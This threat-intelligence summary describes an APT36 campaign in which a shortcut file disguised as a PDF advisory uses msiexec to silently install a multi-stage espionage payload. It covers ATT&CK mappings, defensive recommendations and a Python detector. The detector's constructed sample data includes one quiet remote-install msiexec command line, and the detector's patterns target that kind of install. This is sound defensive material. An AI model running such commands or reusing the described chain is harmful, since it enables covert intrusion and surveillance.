EXECUTIVE SUMMARY:
A malware campaign has been attributed to the APT36 threat actor, a group widely associated with cyber-espionage operations against government, defense, and strategic organizations. The campaign relies heavily on social engineering, using a file that appears to be a legitimate government advisory PDF but is actually a malicious Windows shortcut (.lnk). Because default Windows settings hide file extensions, the shortcut masquerades convincingly as a benign document, increasing the likelihood of user interaction. Once executed, the shortcut initiates a concealed infection chain designed to deploy additional malicious components while maintaining a low user-visible footprint. The primary objective of the operation is to gain persistent access to victim systems, enabling long-term surveillance and remote control. This campaign demonstrates how attackers blend psychological manipulation with technical precision, exploiting user trust and native operating system features to bypass initial suspicion. The approach reflects a mature threat model focused on stealth, persistence, and continued access rather than immediate disruption.
When the malicious .lnk file is opened, it executes an obfuscated command that invokes msiexec.exe to download and silently install an MSI payload from attacker-controlled infrastructure. The MSI package delivers a multi-stage malware framework, including a .NET-based loader and supporting executables designed to extend functionality and evade detection. To distract the victim, a decoy PDF document is dropped and opened, masking the background installation process. The malware establishes persistence by deploying files such as a malicious DLL and registering execution mechanisms through registry modifications using HTA and VBScript components. These techniques ensure the malware survives system reboots and maintains execution capability. Additionally, the malware conducts host reconnaissance, gathering information about the system environment, security tools, and virtualization artifacts. Command-and-control functionality allows the attacker to execute remote commands and adapt operations dynamically, highlighting a flexible and resilient infection chain engineered for sustained access.
This campaign illustrates a highly effective blend of deception, living-off-the-land techniques, and persistence mechanisms commonly associated with advanced threat actors. By abusing trusted system utilities and disguising malicious content as legitimate documentation, the attackers significantly reduce the chances of early detection. Even in cases where command-and-control infrastructure becomes temporarily unavailable, the persistence mechanisms ensure that infected systems remain compromised and capable of reconnecting when infrastructure is restored. The operation highlights the ongoing risk posed by shortcut-based malware delivery and the abuse of installer frameworks like MSI for stealthy payload execution. Defenders should prioritize restricting untrusted shortcut execution, monitoring MSI-based installations, enforcing file-extension visibility, and strengthening endpoint behavioral detection. User awareness combined with intelligence-driven monitoring is critical to mitigating similar threats, as such campaigns continue to evolve in sophistication and operational discipline.
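To make the "monitoring MSI-based installations" recommendation concrete, the following is an added example written for this summary (not code from the cited reports): a small Python triage of constructed Sysmon-style process-creation records that flags msiexec.exe installs sourced from a URL in quiet mode, and HTA/VBScript script hosts spawned from an interactive user session. Field names, file paths, and the URL are all constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation records (not from the report).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'msiexec.exe /i "http://example.invalid/advisory.msi" /qn /norestart'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\AppData\Roaming\update.hta"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c dir"},
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# msiexec accepts both "/" and "-" switch prefixes; normalised to "/" below.
QUIET_FLAGS = {"/q", "/qn", "/qb", "/quiet", "/passive"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def _tokens(cmdline):
    """Split a Windows command line, honouring double-quoted arguments."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(event):
    """Return the detection names that match one process-creation event."""
    hits = []
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    args = _tokens(event["cmdline"])
    flags = {"/" + a[1:].lower() for a in args if a[:1] in ("/", "-")}
    if image == "msiexec.exe":
        remote = any(URL_RE.match(a) for a in args)   # package fetched over HTTP(S)
        quiet = bool(flags & QUIET_FLAGS)              # no installer UI shown to the user
        if remote:
            hits.append("msiexec_remote_quiet_install" if quiet else "msiexec_remote_install")
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS:
        hits.append("script_host_from_user_session")
    return hits


def scan(events):
    """Map event index -> detections for every event that triggers at least one."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```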
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Privilege Escalation | T1548 | Abuse Elevation Control Mechanism | - |
| Defense Evasion | T1027 | Obfuscated Files or Information | - |
| Discovery | T1082 | System Information Discovery | - |
| Discovery | T1518.001 | Software Discovery | Security Software Discovery |
| Collection | T1119 | Automated Collection | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1105 | Ingress Tool Transfer | - |
| Command and Control | T1573.001 | Encrypted Channel | Symmetric Cryptography |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
|---|---|---|
| Execution | E1204 | User Execution |
| Anti-Static Analysis | E1027 | Obfuscated Files or Information |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Command and Control | B0030 | C2 Communication |
| Discovery | B0013 | Analysis Tool Discovery |
| Anti-Behavioral Analysis | B0009 | Virtual Machine Detection |
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/apt-36-uses-fake-whatsapp-fraud-advisory-to-hack-government-systems/
https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/